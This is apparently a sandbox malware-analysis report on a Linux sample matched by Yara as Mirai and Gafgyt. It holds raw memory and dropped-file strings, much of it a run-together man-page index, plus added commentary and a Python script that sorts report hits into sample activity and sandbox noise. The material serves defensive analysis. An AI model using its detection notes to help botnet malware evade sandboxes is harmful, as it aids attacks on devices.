configuration.net::dbus::exporterNet::DBus::Exporter3pm315773746310A--gzExport object methods and signals to the bussane-pint-5516003468200A--gzSANE backend for scanners that use the PINT device driverbpf-helpers7-7715812813670A--gzlist of eBPF helper functionsfull-4415812813670A--gzalways full devicelogin-1115906478670A--gzbegin session on the systemcups-snmp-8815877390340A--gzcups snmp backend (deprecated)ordchr-3am315728089600A--gzconvert characters to strings and vice versasosreport-1116092694050A--gzCollect and package diagnostic and support datatop-1115827827270A--gzdisplay Linux processesuri::_punycodeURI::_punycode3pm315811897880A--gzencodes Unicode string in Punycodettytty4tty1systemd-localed-8816268940210B--gzLocale bus mechanismlvmsadc-8815816289110
Source: 5237.18.dr Binary or memory string: vmware
Source: 5237.18.dr Binary or memory string: qemu-cris
Source: 5237.18.dr Binary or memory string: libvmtools
Source: 5237.18.dr Binary or memory string: qemu-m68k
Source: 5237.18.dr Binary or memory string: qemu-xtensa
Source: 5237.18.dr Binary or memory string: 9qemu
Source: 5237.18.dr Binary or memory string: qemu-sh4
Source: 5237.18.dr Binary or memory string: Dprezip-bin-1116269780060A--gzprefix zip delta word list compressor/decompressornameif-8815490444730A--gzname network interfaces based on MAC addressesxdg-user-dirs-update-1115483406210A--gzUpdate XDG user dir configurationip-link-8815816145190A--gznetwork device configurationhpsa-4415812813670A--gzHP Smart Array SCSI driverhd4-4415812813670A--gzMFM/IDE hard disk devicessane-canon630u-5516003468200A--gzSANE backend for the Canon 630u USB flatbed scannersg_copy_results-8815825816070A--gzsend SCSI RECEIVE COPY RESULTS command (XCOPY related)grub-macbless-8816214898500A--gzbless a mac file/directoryntfstruncate-8815568625640A-tgztruncate a file on an NTFS volumelessfile-1115936459130B--gz"input preprocessor" for less.sane-artec-5516003468200A--gzSANE backend for Artec flatbed scannersrmdir-1115676799200A--gzremove empty directoriessystemd-networkd-wait-online.service-8816268940210A--gzWait for network to come onlinemkfs.ntfs-8815568625640B-tgzcreate an NTFS file systemsg_inq-8815825816070A--gzissue SCSI INQUIRY command and/or decode its responseradattr.so-8815955079440Cpppd-radattr-gzc_rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valuestc-htb-8815816145190A--gzHierarchy Token Bucketgvfs-open-1115868766090A--gzsg_rbuf-8815825816070A--gzreads data using SCSI READ BUFFER commandglib-compile-schemas-1116155671180A--gzGSettings schema compileropenssl-srp-1ssl116164130370B--gzmaintain SRP password fileopenssl-rehash-1ssl116164130370B--gzCreate symbolic links to files named by the hash valueslibvmtools-3315837702310A--gzvmware shared librarypasswd5-5515906478670A--gzthe password filenet::dbus::dumperNet::DBus::Dumper3pm315773746310A--gzStringify Net::DBus objects suitable for printingsane-hp4200-5516003468200A--gzSANE backend for Hewlett-Packard 4200 scannersposixoptions-7715812813670A--gzoptional parts of the POSIX standardnetworkmanager.confNetworkManager.conf5516002723180A--gzNetworkManager 
configuration fileownership-8815771238010A--gzCompaq ownership tag retrieveroakdecode-1115804162510A--gzDecode an OAKT printer stream into human readable form.gvfs-save-1115868766090A--gzmkfs.minix-8815953177680A--gzmake a Minix filesystemuri7-7715812813670A--gzuniform resource identifier (URI), including a URL or URNedit-1115714399500B--gzexecute programs via entries in the mailcap filegit-diff-files-1116148628880A--gzCompares files in the working tree and the index.ldaprc-5516136581350Cldap.conf-gzpactl-1116219586470A--gzControl a running PulseAudio sound servertempfile-1115756848240A--gzcreate a temporary file in a safe mannerhp-check-1115857238880A--gzDependency/Vers
Source: nSg5RM0w0d, 5278.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5281.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5282.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5286.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5289.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5290.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5294.1.000000001e4697c8.0000000045731922.rw-.sdmp Binary or memory string: /usr/bin/qemu-m68k
Source: 5237.18.dr Binary or memory string: .qemu{
Source: 5237.18.dr Binary or memory string: qemu-ppc64abi32
Source: 5237.18.dr Binary or memory string: qemu-ppc64
Source: 5237.18.dr Binary or memory string: qemu-i386
Source: 5237.18.dr Binary or memory string: qemu-x86_64
Source: 5237.18.dr Binary or memory string: H~6\nqemu*q
Source: 5237.18.dr Binary or memory string: @qemu
Source: 5237.18.dr Binary or memory string: Fqqemu
Source: 5237.18.dr Binary or memory string: N4qemu
Source: 5237.18.dr Binary or memory string: ~6\nqemu*q
Source: 5237.18.dr Binary or memory string: qemu-mips64el
Source: 5237.18.dr Binary or memory string: hqemu
Source: 5237.18.dr Binary or memory string: &mqemu
Source: 5237.18.dr Binary or memory string: $qemu
Source: 5237.18.dr Binary or memory string: qemu-sparc
Source: 5237.18.dr Binary or memory string: qemu-microblaze
Source: 5237.18.dr Binary or memory string: qemu-user
Source: 5237.18.dr Binary or memory string: qemu-aarch64
Source: 5237.18.dr Binary or memory string: qemu-sh4eb
Source: 5237.18.dr Binary or memory string: iqemu
Source: 5237.18.dr Binary or memory string: qemu-mipsel
Source: 5237.18.dr Binary or memory string: qemuP`
Source: 5237.18.dr Binary or memory string: qemu-alpha
Source: 5237.18.dr Binary or memory string: qemu-microblazeel
Source: 5237.18.dr Binary or memory string: \qemu
Source: 5237.18.dr Binary or memory string: qemu-xtensaeb
Source: 5237.18.dr Binary or memory string: qemu-mipsn32el
Source: 5237.18.dr Binary or memory string: SAqemu
Source: 5237.18.dr Binary or memory string: Vqemu
Source: 5237.18.dr Binary or memory string: qemu-mipsn32
Source: syslog.67.dr Binary or memory string: Jan 15 00:11:43 galassia kernel: [ 478.955119] Modules linked in: monitor(OE) md4 cmac cifs libarc4 fscache libdes vmw_vsock_vmci_transport vsock binfmt_misc dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua vmw_balloon joydev input_leds serio_raw vmw_vmci sch_fq_codel drm parport_pc ppdev lp parport ip_tables x_tables autofs4 btrfs zstd_compress raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel crypto_simd cryptd glue_helper psmouse ahci mptspi vmxnet3 scsi_transport_spi mptscsih libahci mptbase
Source: 5237.18.dr Binary or memory string: qemuAU
Source: 5237.18.dr Binary or memory string: qemu-riscv32
Source: 5237.18.dr Binary or memory string: qemu-sparc32plus
Source: 5237.18.dr Binary or memory string: 7,qemu
Source: 5237.18.dr Binary or memory string: qemu-s390x
Source: 5237.18.dr Binary or memory string: vmware-checkvm
Source: 5237.18.dr Binary or memory string: qemu-nios2
Source: 5237.18.dr Binary or memory string: qemu-armeb
Source: 5237.18.dr Binary or memory string: -4415868968400A--gzVMware SVGA video driver
Source: 5237.18.dr Binary or memory string: 7xml::parser::style::streamXML::Parser::Style::Stream3pm315701248990A--gzStream style for XML::Parsersystemd-timedated-8816268940210B--gzTime and date bus mechanismxfce4-keyboard-settings-1115867081120A--gzKeyboard settings for Xfcepygettext2-1115841026830B--gzPython equivalent of xgettext(1)sudoedit-8816110660620B--gzexecute a command as another userintro7-7715812813670A--gzintroduction to overview and miscellany sectionsprof-1115812813670A--gzread and display shared object profiling datadhclient.conf-5516219398220A--gzDHCP client configuration filepam_group-8815953742440A--gzPAM module for group accesssystemd-ask-password-1116268940210A--gzQuery the user for a system passwordupdate-dictcommon-hunspell-8815422954860A--gzrebuild hunspell database and emacsen stuffqemu-nios2-1116261022170B--gzQEMU User Emulatorlwp::useragentLWP::UserAgent3pm315750405830A--gzWeb user agent classgpgcompose-1115838662460A--gzGenerate a stream of OpenPGP packetsecho-1115676799200A--gzdisplay a line of textio::socket::ssl::utilsIO::Socket::SSL::Utils3pm315817106800A--gz- loading, storing, creating certificates and keyscurl-1116268709580A--gztransfer a URLgetcap-8815819434600A--gzexamine file capabilitieszegrep-1115762517060B--gzsearch possibly compressed files for a regular expressiongrub-syslinux2cfg-1116214898500A--gztransform syslinux config into grub.cfgrtc-4415812813670A--gzreal-time clockglib::codegenGlib::CodeGen3pm315820097650A--gzcode generation utilities for Glib-based bindings.wpa_cli-8816146062790A--gzWPA command line clientiso_8859_3-7715812813670B--gzISO 8859-3 character set encoded in octal, decimal, and hexadecimaliso_8859-9-7715812813670A-tgzISO 8859-9 character set encoded in octal, decimal, and hexadecimallvextend-8815816289110A--gzAdd space to a logical volumeresolvectl-1116268940210A--gzResolve domain names, IPV4 and IPv6 addresses, DNS resource records, and services; introspect and reconfigure the DNS 
resolverchgrp-1115676799200A--gzchange group ownershipsystemd-cgls-1116268940210A--gzRecursively show control group contentspygettext3.8-1113852085880A--gzPython equivalent of xgettext(1)ping4-8815804258830B--gzsend ICMP ECHO_REQUEST to network hostsidmapwb-8816000845410A--gzwinbind ID mapping plugin for cifs-utilsapturl-gtk-8815799493830B--gzgraphical apt-protocol interpreting package installersane-epsonds-5516003468200A--gzSANE backend for EPSON ESC/I-2 scannersgvfs-monitor-file-1115868766090A--gzrstart-1115829564830A--gza sample implementation of a Remote Start clientgit-stage-1116148628880A--gzAdd file contents to the staging areatc-pedit-8815816145190A--gzgeneric packet editor actioniptables-save-881582899
Source: 5237.18.dr Binary or memory string: I_qemu
Source: 5237.18.dr Binary or memory string: -1116261022170B--gzQEMU User Emulator
Source: 5237.18.dr Binary or memory string: -3315837702310A--gzvmware shared library
Source: 5237.18.dr Binary or memory string: qemu-mips
Source: 5237.18.dr Binary or memory string: qemuj\
Source: nSg5RM0w0d, 5278.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5281.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5282.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5286.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5289.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5290.1.000000001e4697c8.0000000045731922.rw-.sdmp, nSg5RM0w0d, 5294.1.000000001e4697c8.0000000045731922.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/nSg5RM0w0dSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nSg5RM0w0d
Source: 5237.18.dr Binary or memory string: {qemuQ&
Source: 5237.18.dr Binary or memory string: Wgnome-text-editor-111629209547491759146B--gztext editor for the GNOME Desktopx11::protocol::connection::filehandleX11::Protocol::Connection::FileHandle3pm314314075500A--gzPerl module base class for FileHandle-based X11 connectionshtbHTB8815816145190Ctc-htb-gzcifscreds-1116000845410A--gzmanage NTLM credentials in kernel keyringiwconfig-8815490049440A--gzconfigure a wireless network interfaceossl_store-file-7ssl716164130370A--gzThe store 'file' scheme loadertc-stab-8815816145190A--gzGeneric size table manipulationsnotifier-7715877390340A--gzcups notification interfaceqemu-arm-1116261022170B--gzQEMU User EmulatorgemfileGemfile5516263767190Cgemfile2.7-gzglib::object::subclassGlib::Object::Subclass3pm315820097650A--gzregister a perl class as a GObject classnetcat-111612200165426646725B--gzarbitrary TCP and UDP connections and listensdpkg::changelog::parseDpkg::Changelog::Parse3perl315849439740A--gzgeneric changelog parser for dpkg-parsechangelogmpris-proxy-1116243432320A--gzBluetooth mpris-proxybundle-pristine2.7-1116263767190A--gzRestores installed gems to their pristine conditionfsck.ext3-8815816604980B--gzcheck a Linux ext2/ext3/ext4 file systemvolname-1115625752510A--gzreturn volume nameiso-8859-9-7715812813670B--gzISO 8859-9 character set encoded in octal, decimal, and hexadecimalheadhead1HEAD1psd-4415812813670A--gzdriver for SCSI disk driveschrt-1115953177680A--gzmanipulate the real-time attributes of a processvcs-4415812813670A--gzvirtual console memorygit-upload-archive-1116148628880A--gzSend archive back to git-archivenet::dbus::binding::message::errorNet::DBus::Binding::Message::Error3pm315773746310A--gza message encoding a method call errorpkcs11.conf-5516097870510A--gzConfiguration files for PKCS#11 modulessfill-1115227593860A--gzsecure free disk and inode space wiper (secure_deletion toolkit)ldattach-8815953177680A--gzattach a line discipline to a serial linethin_restore-8815811608350A--gzrestore thin 
provisioning metadata file to device or file.phar.phar7.4-1116254980150B--gzPHAR (PHP archive) command line toolbundle-outdated2.7-1116263767190A--gzList installed gems with newer versions availablemail::addressMail::Address3pm315640244160A--gzparse mail addressesopenssl-ca-1ssl116164130370B--gzsample minimal CA applicationchardet3-1115765858900A--gzuniversal character encoding detectorerb2.7-1116263767190A--gzRuby Templatingchktrust-1115826667350A--gzCheck the trust of a PE executable.sg_raw-8815825816070A--gzsend arbitrary SCSI command to a devicegvfs-trash-1115868766090A--gzintro1-1115812813670A--gzintroduction to user commandsmailcap-5515714399500A--gzmetamail capabilities filegigoloGigolo1gig
Source: 5237.18.dr Binary or memory string: vmware-xferlogs
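Reading this section literally would overstate what the sample does. Every process-level hit above (uname queries, truncated logs, the wtmp read further down) comes from daemons of the analysis VM: whoopsie, pulseaudio, rsyslogd, logrotate, gpu-manager, systemd-journald, accounts-daemon. Almost all of the VMware/QEMU strings come from the dropped file 5237.18.dr, whose content is a man-page index (the runs of "-1116261022170B--gzQEMU User Emulator" are mandb entries), and from syslog.67.dr, the guest's own kernel log. The only strings found in the sample's memory dumps are /etc/qemu-binfmt/m68k and /usr/bin/qemu-m68k, together with a command line of the form /usr/bin/qemu-m68k /tmp/nSg5RM0w0d; that is the sandbox running a Motorola 68k ELF under user-mode QEMU via binfmt_misc (the kernel module list in syslog.67.dr includes binfmt_misc), not VM detection performed by the sample. The script below is an added example, not part of the report or of Joe Sandbox; it parses lines in the report's "Source:" format, derives the sample's PIDs from the memory-dump names, and attributes each hit to the sample, to a host daemon, or to another artifact, flagging the emulator paths separately. The report lines it runs on are a constructed excerpt copied or shortened from this page; the category names and the regular expressions are my own.

```python
"""Attribute Joe Sandbox style 'Source:' lines to the sample or to host noise.

Added example (not from the report or from Joe Sandbox). Categories,
regexes and the excerpt below are assumptions made for this illustration.
"""
import re
from collections import Counter

SAMPLE_NAME = "nSg5RM0w0d"  # submitted file name, taken from the report

# Constructed excerpt: lines copied or shortened from the report above.
REPORT_LINES = [
    "Source: /usr/bin/whoopsie (PID: 5929) Queries kernel information via 'uname':",
    "Source: /usr/sbin/logrotate (PID: 5192) Truncated file: /var/log/syslog.1 Jump to behavior",
    "Source: 5237.18.dr Binary or memory string: qemu-arm",
    "Source: nSg5RM0w0d, 5278.1.00000000e75c9218.00000000d9b03796.rw-.sdmp, nSg5RM0w0d, "
    "5281.1.00000000e75c9218.00000000d9b03796.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/m68k",
    "Source: syslog.67.dr Binary or memory string: Jan 15 00:11:43 galassia kernel: "
    "[ 478.955182] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform",
    "Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) Logged in records file read: /var/log/wtmp Jump to behavior",
    "Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY",
    "Source: Yara match File source: dump.pcap, type: PCAP",
    "Source: nSg5RM0w0d, 5278.1.000000001e4697c8.0000000045731922.rw-.sdmp Binary or memory string: /usr/bin/qemu-m68k",
]

# Memory dumps are named <pid>.<n>.<hex16>.<hex16>.<perm>.sdmp, so the PID is recoverable.
DUMP_RE = re.compile(r"\b(\d+)\.\d+\.[0-9a-f]{16}\.[0-9a-f]{16}\.[rwx-]{3}\.sdmp")
PROC_RE = re.compile(r"^Source: (?P<proc>\S+) \(PID: (?P<pid>\d+)\) (?P<detail>.*?)(?: Jump to behavior)?$")
STR_RE = re.compile(r"^Source: (?P<srcs>.+?) Binary or memory string: (?P<detail>.*)$")
YARA_RE = re.compile(r"^Source: Yara match File source: (?P<src>.+?), type: (?P<type>\w+)$")
# Paths that belong to the sandbox's user-mode emulation of a foreign-arch ELF,
# not to VM-detection logic inside the sample.
EMULATOR_RE = re.compile(r"/etc/qemu-binfmt/|/usr/bin/qemu-")


def sample_pids(lines):
    """PIDs of the sample: dump names listed next to the sample name carry them."""
    pids = set()
    for line in lines:
        if SAMPLE_NAME in line:
            pids.update(int(p) for p in DUMP_RE.findall(line))
    return pids


def parse_line(line):
    """Split one report line into kind / source / pid / detail, or None if unknown."""
    m = PROC_RE.match(line)
    if m:
        return {"kind": "process", "source": m["proc"], "pid": int(m["pid"]), "detail": m["detail"]}
    m = YARA_RE.match(line)
    if m:
        pid = DUMP_RE.search(m["src"])
        return {"kind": "yara", "source": m["src"], "pid": int(pid.group(1)) if pid else None, "detail": m["type"]}
    m = STR_RE.match(line)
    if m:
        pids = {int(p) for p in DUMP_RE.findall(m["srcs"])}
        return {"kind": "string", "source": m["srcs"], "pid": min(pids) if pids else None, "detail": m["detail"]}
    return None


def attribute(rec, pids):
    """'sample' for the submitted file, 'host' for sandbox daemons, 'other' for dropped files/pcap."""
    if rec["kind"] == "process":
        if rec["pid"] in pids or rec["source"].rsplit("/", 1)[-1] == SAMPLE_NAME:
            return "sample"
        return "host"
    if SAMPLE_NAME in rec["source"] or rec["pid"] in pids:
        return "sample"
    return "other"


def triage(lines):
    """Count hits per (kind, owner) and collect what is really attributable to the sample."""
    pids = sample_pids(lines)
    summary, sample_hits, emulator_hits = Counter(), [], []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        who = attribute(rec, pids)
        summary[(rec["kind"], who)] += 1
        if who == "sample":
            sample_hits.append(rec["detail"])
            if rec["kind"] == "string" and EMULATOR_RE.search(rec["detail"]):
                emulator_hits.append(rec["detail"])
    return {"sample_pids": pids, "summary": summary,
            "sample_hits": sample_hits, "emulator_hits": emulator_hits}


if __name__ == "__main__":
    result = triage(REPORT_LINES)
    print("sample PIDs:", sorted(result["sample_pids"]))
    for (kind, who), n in sorted(result["summary"].items()):
        print(f"{kind:8s} {who:7s} {n}")
    for s in result["emulator_hits"]:
        print("emulator artefact, not sample VM detection:", s)
```

On the excerpt this leaves three host-daemon behaviours, two strings from dropped files, one Yara hit on a sample memory dump, and two sample-memory strings that are both emulator paths; the same attribution applied to the full section reduces the "evasion" evidence to the Yara matches and the network signatures elsewhere in the report.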

Language, Device and Operating System Detection:

barindex
Reads system files that contain records of logged in users
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5504) Logged in records file read: /var/log/wtmp Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5744) Logged in records file read: /var/log/wtmp Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Yara detected Gafgyt
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Mirai
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Yara detected Gafgyt
Source: Yara match File source: nSg5RM0w0d, type: SAMPLE
Source: Yara match File source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY